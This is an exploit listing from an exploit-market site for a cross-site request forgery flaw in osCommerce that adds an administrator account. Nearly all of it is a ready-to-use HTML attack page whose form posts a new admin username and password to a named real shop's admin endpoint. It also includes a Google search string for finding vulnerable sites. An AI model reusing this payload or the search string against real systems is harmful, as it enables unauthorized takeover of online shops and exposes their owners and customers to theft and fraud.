[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Os-Commerce CSRF Vulnerability (Add Admin)

Author
saidinh0
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15471
Category
web applications
Date add
27-01-2011
Platform
php
# Exploit Title: Os-Commerce CSRF Vulnerability (Add Admin)
# Google Dork: Powered by Oscommerce // allinurl:product_info.php?cPath
# Date: 01/26/2011 
# Author:Saidinh0
# Software Link:http://oscommerce.com/
# Home: http://english7.info
# Version: v  3.1 
# Tested on: ubuntu + windows sp2
# Email : cgd@Hotmail.com 
#######################################################

[~] Exploit C0dE [+]

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="ltr" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>osCommerce Online Merchant Administration Tool</title>
<link rel="stylesheet" type="text/css" href="includes/stylesheet.css">
<script language="javascript" src="includes/general.js"></script>
</head>
<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0" bgcolor="#FFFFFF" onload="SetFocus();">
<!-- header //-->
<table border="0" width="100%" cellspacing="0" cellpadding="0">
  <tr class="headerBar">
    <td class="headerBarContent" align="right">&nbps;&nbps;</td>
  </tr>
</table><!-- header_eof //-->

<!-- body //-->
<table border="0" width="100%" cellspacing="2" cellpadding="2">
  <tr>
    <td width="125" valign="top">&nbps;</td>
<!-- body_text //-->
    <td width="100%" valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading">&nbps;</td>
            <td class="pageHeading" align="right" width="57">&nbps;</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td width="25%" valign="top">
<form name="administrator" action="http://www.infoboutik.fr/admin/administrators.php/login.php?action=insert" method="post">
<table border="0" width="100%" cellspacing="0" cellpadding="2">
  <tr>
    <td class="infoBoxContent" align="center"><font color="#FF0000"><b>OsCommerce Add Admin</b></font></td>
  </tr>
  <tr>
    <td class="infoBoxContent" align="center"><br>USERNAME<br><input type="text" name="username"></td>
  </tr>
  <tr>
    <td class="infoBoxContent" align="center"><br>PASSWORD<br><input type="password" name="password" maxlength="40"></td>
  </tr>
  <tr>
    <td align="center" class="infoBoxContent"><br>
	<input type="image" src="http://demo.opensourcecms.com/oscommerce/admin/includes/languages/english/images/buttons/button_save.gif" border="0" alt="Save" title=" Save " width="76" height="22">&nbps;<a href="http://demo.opensourcecms.com/oscommerce/admin/administrators.php/login.php"><img src="http://demo.opensourcecms.com/oscommerce/admin/includes/languages/english/images/buttons/button_cancel.gif" border="0" alt="Cancel" title=" Cancel " width="80" height="22"></a></td>
  </tr>
</table>
</form>
            </td>
          </tr>
        </table></td>
      </tr>
    </table></td>
<!-- body_text_eof //-->
  </tr>
</table>
<p align="center">By Saidinh0</p>
</body>
</html>



#  0day.today [2024-11-15]  #